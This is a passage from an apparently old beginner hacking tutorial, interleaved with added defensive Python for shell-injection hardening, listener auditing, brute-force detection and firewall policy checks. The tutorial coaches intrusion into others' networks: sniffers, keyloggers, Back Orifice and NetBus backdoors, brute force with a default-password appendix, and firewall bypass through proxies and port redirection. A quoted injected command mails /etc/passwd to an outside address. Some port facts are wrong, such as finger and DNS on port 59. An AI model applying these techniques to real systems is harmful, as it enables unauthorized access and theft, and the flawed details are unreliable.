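def commands_shell_would_run(command_line: str) -> list[list[str]]:
    """Tokenise a command line the way a Bourne shell would and split it at
    command separators, so the injected second command becomes visible."""
    lex = shlex.shlex(command_line, punctuation_chars=True)
    lex.whitespace_split = True
    commands, current = [], []
    for tok in lex:
        if tok in (";", "|", "&", "&&", "||"):
            if current:
                commands.append(current)
            current = []
        else:
            current.append(tok)
    if current:
        commands.append(current)
    return commands


def hardened_argv(form_value: str) -> list[str]:
    """Validate against the allowlist, then build an argv list. Run it with
    subprocess.run(argv) (no shell=True) so no character in the value is ever
    interpreted by a shell; anything else is rejected before it reaches finger."""
    if not USER_RE.fullmatch(form_value):
        raise ValueError("finger: rejected request for %r" % form_value)
    return ["finger", form_value]


if __name__ == "__main__":
    # The exact form value the text above uses.
    injected = "root ; mail you@youremail.address < /etc/passwd"
    print(commands_shell_would_run(vulnerable_command(injected)))
    for value in ("root", injected):
        try:
            print("allowed:", hardened_argv(value))
        except ValueError as err:
            print("blocked:", err)
```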
Sniffing and Keylogging
Oftentimes you'll need to break into not-so-interesting computers to get to your ultimate goal. If you are trying to break into your target
network's webserver (www.yourtarget.com), and while trying, found a vulnerability in their mail server (mail.yourtarget.com), you have a
few options on how to get into the webserver from the mailserver. If you install a sniffer (available at many hacker sites), it will look at
all data passing it on the network for passwords and the like. It will copy and store that information in a file for you to periodically check.
Sniffing (which is considered an eleet hacker tactic), if done correctly, almost always provides results. Another option is installing a
keylogger on the mailserver. Any keystrokes entered on that computer are kept in a log file. Periodically check the file, and you'll usually
come up with a password to something else interesting. Be careful though. If you don't hide your sniffers or keyloggers well, you stand a
good chance of getting busted, or at least losing any access you had.
Leapfrogging
Most firewalls keep you out of 90% of any given network on the Internet. How? They look at your IP address, and determine if they should
allow you in or not. Usually, this is a router (a piece of hardware used to connect different networks) that has a list of IP addresses to
accept. If yours is not in that list, it will reject your connection. It's a good bet that this list contains mostly machines inside that network,
or from a few other trusted networks. Oftentimes router firewalls let connections pass from other computers in the same subnet. Let's
pretend you are 203.22.54.77. You want to get into admin.somecorp.com (34.14.91.15), which is behind the firewall.
www.somecorp.com is (like most webservers are) in front of the firewall, and is 34.14.91.3. If you try to telnet to admin, chances are you
won't even get a login prompt, just a 'connection failed' message. But if you telnet to www, then to admin, your IP address is that of
www - 34.14.91.3 - which is in the same subnet as admin, and will most likely be accepted. And there you have your login prompt at
admin.somecorp.com. This is conceptually hacking around a firewall. To break right through, well, you'd better be elite.
Trojans
Don't assume that once you have access (be it a rootshell or just user or guest access) to a computer, you always will. One good way to
increase your chances of keeping access to this computer is to put in a back door of some kind. The easiest (and arguably most helpful to
a hacker) is a Trojan Horse. Trojans come in all shapes and sizes, for all kinds of OS's. The two most popular are Back Orifice (BO 2000
just came out), and NetBus. Both are for Windows boxes (try RootKit for a UNIX trojan). BO by itself is command line, but GUIs
(Graphical User Interfaces) are available for it. BO has a server (that you install on your target) and a client program (that you use at
home to control your target). With it, you can browse and manipulate data and directories on your target. You can send message boxes
to the computer to scare people on it. NetBus, on the other hand, has more functions than BO (like screenshots of your victim, opening
and closing the CD-ROM, etc), but doesn't hide itself quite as well as BO. NetBus, like BO, has a client and a server. Though Trojans are
extremely fun for scaring sysadmins, if you want to keep your access to the box, you should only use them as a backdoor.
Port Hacking
If you can't find any exploits for the daemon you've found, that doesn't mean it's not vulnerable. Theoretically, every daemon bound to a
TCP port is vulnerable to being used as an access point to the computer's insides. Telnet to the port, and interact with the daemon. At the top of
your telnet window is the word 'Telnet.' As soon as it says 'Telnet - www.yourtarget.com' (or some IP address) you are connected and have
established a session, whether you see text or not. Send control characters (control-x, control-c, etc). Type commands like GET, GO,
START, LOGON, INIT, etc. If what you type doesn't show up on the screen, that means that the daemon isn't echoing your
characters back to you - turn on your local echo so you can see what you are typing.
For example, did you know that when browsers connect to the HTTP port, they issue commands based on the URLs you request? You can
do this manually - telnet to port 80, issue a GET command with the page you want to view, hit enter twice, and the HTML will pour
across the screen. You are doing manually what Netscape, Internet Explorer, and Lynx do for you (except browsers parse the HTML
into readable text). Any client program that communicates with a server program on some port is just issuing various commands to the
daemon based on how the user interacts with the client interface. Sometimes, an initialization command needs to be issued before the
daemon will talk to you. Try anything you can think of. Also, it helps to know what types of programs are bound to the port you are
hacking. Refer to the RFC on well known ports at the end of this text.
One last note on this topic. Sometimes, sysadmins, authorized users, and even other hackers will bind a daemon to some extremely high
port number as a back door. Casual portscans will miss these, unless they are set to scan to high numbers. If you see port 12345 or 31337
open on some computer, someone was here before you - these are the defaults used by the NetBus and Back Orifice trojans. Also, lazy
system administrators sometimes put daemons on high port numbers that let them telnet in without a password. The moral of this story?
Always scan to at least 40000.
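A sysadmin can turn the note above around: compare what is actually listening on a box with what should be. This added example (mine, not from the text or from either trojan's authors) parses a constructed `netstat -an` listing and flags the NetBus and Back Orifice defaults named above plus any unexpected listener at or above 40000; the expected-port list and the sample output are assumptions.

```python
import re

# Default ports the text attributes to the two trojans (BO listens on UDP).
TROJAN_DEFAULTS = {("tcp", 12345): "NetBus default",
                   ("udp", 31337): "Back Orifice default"}
HIGH_PORT_FLOOR = 40000   # the text's "always scan to at least 40000"

# Constructed sample in the shape of Linux `netstat -an` output (not real data).
SAMPLE_NETSTAT = """\
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:23              0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:12345           0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:45678           0.0.0.0:*               LISTEN
tcp        0      0 10.0.0.5:23             10.0.0.9:1045           ESTABLISHED
udp        0      0 0.0.0.0:31337           0.0.0.0:*
"""

LINE_RE = re.compile(
    r"^(?P<proto>tcp|udp)\s+\d+\s+\d+\s+(?P<local>\S+)\s+(?P<remote>\S+)\s*(?P<state>\S+)?")


def bound_ports(netstat_text: str) -> set[tuple[str, int]]:
    """Return (proto, port) pairs that accept traffic: TCP sockets in LISTEN,
    and UDP sockets with no peer (foreign address '*')."""
    found = set()
    for line in netstat_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        port = int(m["local"].rsplit(":", 1)[1])
        if m["proto"] == "tcp" and m["state"] == "LISTEN":
            found.add(("tcp", port))
        elif m["proto"] == "udp" and m["remote"].endswith(":*"):
            found.add(("udp", port))
    return found


def audit_listeners(netstat_text: str, expected: set) -> list[tuple[str, int, str]]:
    """Every bound port not on the expected list gets a finding; known trojan
    defaults are named, other high ports are reported as unexpected."""
    findings = []
    for proto, port in sorted(bound_ports(netstat_text)):
        if (proto, port) in expected:
            continue
        if (proto, port) in TROJAN_DEFAULTS:
            findings.append((proto, port, TROJAN_DEFAULTS[(proto, port)]))
        elif port >= HIGH_PORT_FLOOR:
            findings.append((proto, port, "unexpected high-port listener"))
        else:
            findings.append((proto, port, "not on the expected list"))
    return findings


if __name__ == "__main__":
    for finding in audit_listeners(SAMPLE_NETSTAT, {("tcp", 23), ("tcp", 80)}):
        print("%s/%d: %s" % finding)
```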
Brute Force
When all else fails, you might be left with no other option than a brute force attack. This means hurling usernames and passwords at the
system until it cracks. Use the list of commonly used combinations supplied with this text. Spend time trying to crack individual email
addresses. Honestly, you haven't made a full-hearted brute force attempt until you've spent at least two or three hours doing nothing but
trying different combinations. Since Unix login prompts won't tell you if you've used a valid login name or not, narrow it down! Here is a
quick list on how to obtain usernames:
*If port 59 (finger) is open, you will be able to obtain lots of usernames. Telnet in!
*Telnet to port 25 (SMTP) and use the VRFY command to verify the existence of usernames. Type HELP for more
commands.
*Any email addresses on the network's website will be valid usernames.
*Look at the /etc/passwd file of any Unix machine (including one of your own). There are tons of default usernames that get
used all the time.
Also, you could write a program (or shell script if you have a Unix box yourself) to spit usernames and passwords from a dictionary
wordlist file (available all around the Net, usually as a supplement to password crackers) at the system.
If you want to become eleet eventually, you'll need to learn at least a little about at least a few programming languages. The easiest (yet
still effective) language to learn, especially for newbies, is Visual Basic. I once wrote a VB prog that used NetCat, and repeatedly
telnetted to my target and spat usernames (from a list that I compiled that I knew to be valid usernames) and passwords (from a huge
dictionary file), and redirected all output to my screen and a log file. I'm no programming expert, but with an hour of coding and another
of debugging, all I had to do was sit back and watch as my little proggie automated a brute force attack with decent speed. Just remember
- brute force will always work, eventually.
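From the other side of the login prompt, a brute force run like the one described above is loud. This added detection example (mine, not from the text) runs over constructed login-failure lines in a syslog-like shape and raises an alert when one source piles up failures or tries several usernames inside a window, then flags a later success from that source; the line format, thresholds and addresses are assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

WINDOW_SECONDS = 300     # look-back window per source address
FAIL_THRESHOLD = 5       # failures inside the window from one source
SPRAY_THRESHOLD = 3      # distinct usernames tried from one source

# Constructed sample lines in a syslog-like shape (not real logs). The outside
# address is the one the text uses for "you".
SAMPLE_LOG = """\
Mar  3 02:14:01 mail login[2011]: FAILED LOGIN 1 FROM 203.22.54.77 FOR root, Authentication failure
Mar  3 02:14:09 mail login[2011]: FAILED LOGIN 2 FROM 203.22.54.77 FOR root, Authentication failure
Mar  3 02:14:17 mail login[2013]: FAILED LOGIN 1 FROM 203.22.54.77 FOR sys, Authentication failure
Mar  3 02:14:25 mail login[2013]: FAILED LOGIN 2 FROM 203.22.54.77 FOR bin, Authentication failure
Mar  3 02:14:33 mail login[2015]: FAILED LOGIN 1 FROM 203.22.54.77 FOR guest, Authentication failure
Mar  3 02:14:41 mail login[2015]: LOGIN ON ttyp0 BY guest FROM 203.22.54.77
Mar  3 02:15:02 mail cron[311]: (root) CMD (run-parts /etc/cron.hourly)
Mar  3 02:15:10 mail login[2020]: FAILED LOGIN 1 FROM 10.0.0.9 FOR jdoe, Authentication failure
Mar  3 02:15:18 mail login[2020]: LOGIN ON ttyp1 BY jdoe FROM 10.0.0.9
"""

TS = r"(?P<ts>\w{3}\s+\d{1,2} \d\d:\d\d:\d\d)"
FAIL_RE = re.compile(TS + r" \S+ login\[\d+\]: FAILED LOGIN \d+ FROM (?P<src>[\d.]+) FOR (?P<user>\S+),")
OK_RE = re.compile(TS + r" \S+ login\[\d+\]: LOGIN ON \S+ BY (?P<user>\S+) FROM (?P<src>[\d.]+)")


def to_seconds(ts: str) -> float:
    # Syslog timestamps carry no year; pin one so differences are well defined.
    stamp = datetime.strptime(ts, "%b %d %H:%M:%S").replace(year=2000)
    return (stamp - datetime(2000, 1, 1)).total_seconds()


def detect_brute_force(log_text: str) -> list[dict]:
    alerts = []
    recent = defaultdict(deque)   # src -> (time, user) failures inside the window
    flagged = set()               # sources already reported, to avoid repeats
    for line in log_text.splitlines():
        m = FAIL_RE.match(line)
        if m:
            now, src = to_seconds(m["ts"]), m["src"]
            window = recent[src]
            window.append((now, m["user"]))
            while window and now - window[0][0] > WINDOW_SECONDS:
                window.popleft()
            users = {user for _, user in window}
            if src not in flagged and (len(window) >= FAIL_THRESHOLD or len(users) >= SPRAY_THRESHOLD):
                flagged.add(src)
                alerts.append({"src": src, "kind": "password guessing",
                               "failures": len(window), "distinct_users": len(users)})
            continue
        m = OK_RE.match(line)
        # A success from a source already flagged is the one that matters most.
        if m and m["src"] in flagged:
            alerts.append({"src": m["src"], "kind": "login after guessing", "user": m["user"]})
    return alerts


if __name__ == "__main__":
    for alert in detect_brute_force(SAMPLE_LOG):
        print(alert)
```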
Firewall Penetration
Ahh firewalls. Technology with only one purpose - keeping hackers out. Many newbies are intimidated by a system they know has a
firewall, and don't even bother. Technically, though, every network has a firewall. A firewall, by definition, is nothing more than a
system used to secure the network. Nothing specific, just that and nothing more. So if all that is blocking a network from outside access
is a UNIX login prompt, that is its firewall. Generally speaking, though, when we refer to a firewall, there are a few distinct levels. Here
I'll explain those levels, and how to circumvent them.
Routers as Firewalls
When you scan a class C subnet, and find three computers, do you think that those are the only three computers on that network? Not
usually. Every network that is connected to the Internet is connected via a complex piece of hardware known as a router. Routers route
packets of data based on the source IP address of the sending machine, and the destination IP address of the receiving machine. Similarly,
routers can block certain IP addresses. Every packet of data sent to any computer in your target network must pass through the router
connecting the two, and if the router is programmed to not let connections be made to one particular computer, it will discard all packets
sent to it, thus blocking you from connecting to it. Also, routers can be set up to allow connections to certain machines, but block certain
port numbers. So if you scan a machine that has an open port 23 but is being blocked by the router, you won't be able to establish a
connection. It is rare, though, that routers are configured to disallow connections from all IP addresses. Generally, they will allow a select
number of IP addresses through, like affiliate companies, or different networks of the same company. So how do you penetrate a
firewall router that won't let you through? Masquerade as a trusted computer. Bounce your connection off a computer that the router
might let by. For example, let's say you hacked an account on the webserver (port 23 was not blocked). That's not enough for you - you
want root on the hub computer of the network. But port 23 is blocked on it. You might connect to the webserver, then, from it, telnet to
your target machine. Chances are the router will let you connect - why wouldn't it let a computer from its own network connect?
Any computer that is blocked by an IP filtering router is said to be behind the firewall. Any that is not blocked is said to be in front of the
firewall. There are a number of computers that cannot be behind a firewall. The web server, for example. How could people get the web
page of your target if it was blocked? Also, mail servers have to be in front of the firewall, so that emails aren't blocked, and get sent to the
appropriate recipient. Name servers (computers with port 59, DNS, open) also cannot be blocked, as they are the computers that translate
names (such as www.microsoft.com) into a network IP address. The trick to connecting to a computer blocked by a packet filtering router
is to masquerade as a computer in a trusted network, or as a computer in front of the firewall.
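The 'Leapfrogging' case earlier and the router discussion here are the same policy mistake, so one check covers both. This added example (mine, not the text's) models a first-match IP filter with the text's addresses (203.22.54.77 outside, 34.14.91.3 the webserver, 34.14.91.15 admin) and shows why a subnet-trust rule lets the bounced connection through while a segmented policy does not; the two rule sets and the 34.14.91.0/24 mask are assumptions.

```python
import ipaddress
from typing import NamedTuple, Optional


class Rule(NamedTuple):
    action: str                       # "allow" or "deny"
    src: ipaddress.IPv4Network
    dst: ipaddress.IPv4Network
    port: Optional[int]               # None matches any destination port


def net(text: str) -> ipaddress.IPv4Network:
    return ipaddress.ip_network(text, strict=False)


ANY = net("0.0.0.0/0")
CORP = net("34.14.91.0/24")           # assumed mask for the text's example subnet
WEB = net("34.14.91.3/32")            # www.somecorp.com, in front of the firewall
ADMIN = "34.14.91.15"                 # admin.somecorp.com, behind the firewall
OUTSIDER = "203.22.54.77"             # the text's "you"

# What the text describes: the router trusts anything already on its own subnet,
# and the webserver's telnet port was left reachable from outside.
SUBNET_TRUST = [
    Rule("allow", ANY, WEB, 80),
    Rule("allow", ANY, WEB, 23),
    Rule("allow", CORP, CORP, None),
    Rule("deny", ANY, ANY, None),
]

# The fix: hosts that must be reachable from outside get no path inward, and
# only the service they exist for is exposed.
SEGMENTED = [
    Rule("allow", ANY, WEB, 80),
    Rule("deny", WEB, CORP, None),
    Rule("allow", CORP, CORP, None),
    Rule("deny", ANY, ANY, None),
]


def decide(rules: list, src_ip: str, dst_ip: str, port: int) -> str:
    """First matching rule wins; no match means deny."""
    src, dst = ipaddress.ip_address(src_ip), ipaddress.ip_address(dst_ip)
    for rule in rules:
        if src in rule.src and dst in rule.dst and rule.port in (None, port):
            return rule.action
    return "deny"


def leapfrog(rules: list, attacker: str, hop: str, target: str, port: int) -> str:
    """The two-step path from the text: telnet to the hop with the attacker's
    address, then on to the target with the hop's address."""
    if decide(rules, attacker, hop, 23) != "allow":
        return "blocked at hop"
    if decide(rules, hop, target, port) != "allow":
        return "blocked at target"
    return "reached target"


if __name__ == "__main__":
    for name, policy in (("subnet trust", SUBNET_TRUST), ("segmented", SEGMENTED)):
        print(name, "| direct:", decide(policy, OUTSIDER, ADMIN, 23),
              "| via www:", leapfrog(policy, OUTSIDER, "34.14.91.3", ADMIN, 23))
```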
There are other ways to masquerade as a computer from inside your target network to pass through a firewall. What if your target
machine is an NT Server? There is no telnet daemon. Well, if there are NT servers on the network, there will be NT Workstations
and Windows 9x boxes too.
And those machines will probably have Internet access. How do they connect to the Internet? Via a proxy server
- all HTTP requests are directed to the designated proxy server, which requests the URL for them, gets it from whatever webserver the web
page is on, and sends it back to the workstation inside the internal network that originally requested it. Remember that when computers
surf the Internet via a proxy server, their IP address (to the Internet) is that of the proxy server (read the 'keeping from getting caught'
section for more details on how this works, or check the definition of 'proxy server' at the beginning of this text). So how do you connect
to a webpage on an internal computer that is blocked by the router? Connect via the network's proxy server. If a proxy server
exists (which one will, 99% of the time), it cannot be blocked by a firewall - how would the requested web pages be sent back to it if it
were? Okay, so we know that one of the computers that turned up on a subnet scan is probably a proxy server. Your next step is to use it
to make connections for you. Go to your Netscape or Internet Explorer settings, and select 'proxies.' (Note: proxy settings in your Internet
Preferences or Control Panel only work if you are physically connected to a proxy server, meaning on the same LAN as it.) For
HTTP ports, try 80, 8080, 88, and 8888. For FTP, try 21, 2121, etc. It's less common, though, for proxy servers to be set up to handle FTP
proxying. So for each computer you found on the subnet, enter it in as a proxy server in your browser settings, hit 'Okay,' and then just
request any web page. www.hackers.com, or whatever. On the bottom of your screen, you will see your browser attempting to connect to
the proxy server. If you get an error message, the computer is not a proxy server, or you specified the wrong port number (try some
others). If the web page you requested shows up in your browser - congratulations, you connected to the proxy. Now request pages (or
an FTP session) with a computer behind the firewall - chances are it will let you in since your IP address is now the proxy server's when
making connections of the protocol you specified to use proxies for (and again, firewalls generally allow connections from computers of
their own network). Now, proxy servers will allow computers to use them as a proxy based on a set of criteria. These are:
*Always - any computer connecting will be allowed to use this proxy (known as a public proxy)
*Depending on who connects to it, ie: the IP address of the connecting computer, or
*If the connecting computer can validate itself with a username and password
If you are prompted with a username and password request, you are not out of luck. Get yourself WebCrack, enter the proxy server as the
target machine, and launch an attack. Proxy server authentication is exactly the same as password protection of private web pages, and
WebCrack will brute force until it's let in. Once you find a valid username and password combo, you will be able to use the proxy. Now
connect to the computer blocked by the router.
You've just cracked a firewall.
Private IP Networks as Firewalls
Certain ranges of IP addresses are known as 'private.' For example, all the 10.x.x.x (class A) networks are private, and if you try to
connect (telnet, http, whatever) to one of these addresses, the address will not resolve (ie: you won't be able to connect). Often times,
companies will buy a range of private IP addresses, in order to keep hackers out. This is another form of a firewall. However, if the
company wants their network connected to the Internet in any fashion (for their workstations to be able to surf, or for email, or whatever),
at least one computer has to have a public IP address, meaning an IP address that the Internet (and therefore you) can connect to. This
computer is a proxy server of sorts, and generally has two Network Interface Cards (adapters used to connect network cable to), one with
one of the private addresses, one with a public address. This 'public' computer, being the specialized proxy server, will (unlike your
computer, and any other on the Internet) understand the private address. So to connect to the 10.x.x.x (or whatever private address your
target uses internally), you'll need to connect to the proxy server. If it's a Unix machine, you'll have to get an account with telnet access,
and telnet from it to your destination. If it's a Windows machine, you'll have to use the proxying method explained above.
Since the proxy server is the only computer on the entire Internet that is able to connect to the private network protected by this type of
network, you will have to connect through it. One other option is hacking into it, and installing a port redirector program. For example: if
you can install NetBus onto the computer, you can set it to redirect all connections made to a port you specify to another address. So let's
say when you try to connect to 10.2.56.14 (reserved) with telnet, you get a 'failed to resolve address' message, meaning that address is not
on the Internet, and neither your computer (nor any other on the Internet) understands that address. But you know that 204.56.87.5 (an address
that is on the Internet, and that you can connect to) is the proxy server for the 10.2.56 network. You break in, install NetBus, and set the
port redirector to 10.2.56.14. Next - telnet to 204.56.87.5 (on the port you specified to be redirected) and since 204.56.87.5 knows where
10.2.56.14 is, your connection will be bounced over to that machine.
Congrats - you've just penetrated another firewall.
In Summary
With this text I've scratched the surface of the hacking of today. If nothing else, you should have learned just how much you're going to
have to learn to become a proficient hacker. You'll need to learn more about various protocols, about different operating systems.
Learning programming languages such as C or Perl would definitely help you. There are a lot of programs out there, but most do the
same as their legitimate counterparts would do, and don't allow much room for fine tuning. Imagine the power in the ability to write a
target-specific program to aid you in hacking it! Anyways, I also strongly suggest installing Linux on your machine as well. Unix is
more powerful (and therefore more complex) than DOS and Windows, and the only way you'll learn anything about it is to have it (not to
mention raw sockets!). Even a book wouldn't be of much use if you had nothing to apply what you've learned on. When faced with a
challenge that you don't quite understand, fumble your way through. Try not to ask for help all the time. You'll learn a lot more that way -
and not just about the obstacle in question. In closing, let me say that you should never decide that you know enough. An unquenchable
thirst for knowledge is what drives the real hacker. The process, not the end result. I guess I see no better way to end this text than with
my favorite quote (from a good friend of mine):
"What do you want to hack today?"
< Kurruppt2k >
Appendix A - Commonly used and default usernames/passwords
root: root
sys: sys / system / bin
bin: sys / bin
mountfsys: mountfsys
adm: adm
uucp: uucp
nuucp: anon
anon: anon
user: user
games: games
install: install
demo: demo / tour / guest
umountfsys: umountfsys
sync: sync
admin: admin
guest: guest
daemon: daemon
qadmin: adm / admin
123: lotus / lotus123
anonuucp: anon / uucp
asg: device / devadmin
backup: save / tar
csr: support / castup
dbcat: database / catalog
default: user / guest
diag: diag / sysdiag(s)
field: fld / test / support
end: visitor / demo / tour
informix: database
ingres: database
lib: library / syslib
lp: print / lpadmin
main: sysmaint / service
mail: mail / email / phones
manager: mgr / man
ncrm: ncr
net: netowrk
netinst: inst / install / net
netman: net / man / mgr
netmgr: mgr / man / net
network: net
nobody: anon
oasys: oa
odt: opendesktop
oper: operator / sysop
sysop: sysadm / sysop
ftp: ftp / anon / anonymous
telnet: telnet
visitor: anon / guest
www: webmaster / webadmin
Appendix B - Unix commands
Here are some basic commands that work on most Unix flavors
cd [dir] change directory to [dir]. cd with no arguments will place you in your home directory.
pwd tells you what directory you're currently in.
ls lists the files in your pwd
ls -a lists all files in your pwd, even hidden files (files that begin with a period)
ls -l lists the files in your pwd, and gives the permissions for them
cat [file] displays the file you give it on the screen, equivalent to 'type' in DOS
vi, emacs, and pico text editors, similar to MS-DOS Edit
man [command] gives you the manual (help pages) on a particular command - USE THIS!!!
cp [src] [dst] copy a file
rm [file] delete a file
mv [file] move or rename a file
mkdir create a directory
chmod change permissions of a file you own
grep search a file for a particular string
talk chat with a user
mail, pine and elm email utilities
Also, if you are familiar with DOS redirects, appends, and pipes, they work similarly in Unix. Remember, when in doubt, RTFM!
Appendix C - Further Reading
There are lots of texts on hacking and Internet security out there, and a few books as well. As stated at the beginning of this one, a large
portion of those are vague and too theoretical to be of use to anyone. So here is a small collection of recommended reading I put together.
Texts
Hacking Kit (www.hackers.com) - focuses on UNIX hacking, and has lots of C code for various utilities and exploits.
Hacker's Desk Reference (www.hackersclub.com/km/fils/hfiles) - focuses on NT and Windows Networking environments.
A great resource, but might be a bit much for newbies.
Guides to Mostly Harmless Hacking (www.happyhacker.org) - this series is great for green hackers. They provide step-by-step methods
and techniques on a variety of topics, from encryption to Windows hacking, to Unix, etc.
Books
Maximum Security - "The Hacker's Bible." This book will not give you step-by-step instructions on how to hack. If you already know a
lot of the basics, this book is a must. The second edition is about two inches thick. Even when you become "elite," this book is a great
reference to have around.
Happy Hacker - a compilation of the GtMHH's. A good book for aspiring hackers.
Inside TCP/IP - gives you a wide knowledge of the protocol used on the Internet, and explains how to use it to set up all kinds of servers
(web, FTP, etc).
The Big Unix Book - you will need to know Unix, so grab this book too.
Windows NT Core Technology - if you want to know the inner workings of NT, grab this one too.
The Rainbow Books - priceless resources to any hacker... but I won't tell you any more.
Appendix D - Commonly known UDP and TCP ports
PORT NUMBERS
The port numbers are divided into three ranges: the Well Known Ports,
the Registered Ports, and the Dynamic and/or Private Ports.
The Well Known Ports are those from 0 through 1023.
The Registered Ports are those from 1024 through 49151
The Dynamic and/or Private Ports are those from 49152 through 65535
WELL KNOWN PORT NUMBERS
The Well Known Ports are assigned by the IANA and on most systems can
only be used by system (or root) processes or by programs executed by
privileged users.
Ports are used in the TCP [RFC793] to name the ends of logical
connections which carry long term conversations. For the purpose of
providing services to unknown callers, a service contact port is
defined. This list specifies the port used by the server process as
its contact port. The contact port is sometimes called the
"well-known port".
To the extent possible, these same port assignments are used with the
UDP [RFC768].
The assigned ports use a small portion of the possible port numbers.
For many years the assigned ports were in the range 0-255. Recently,
the range for assigned ports managed by the IANA has been expanded to
the range 0-1023.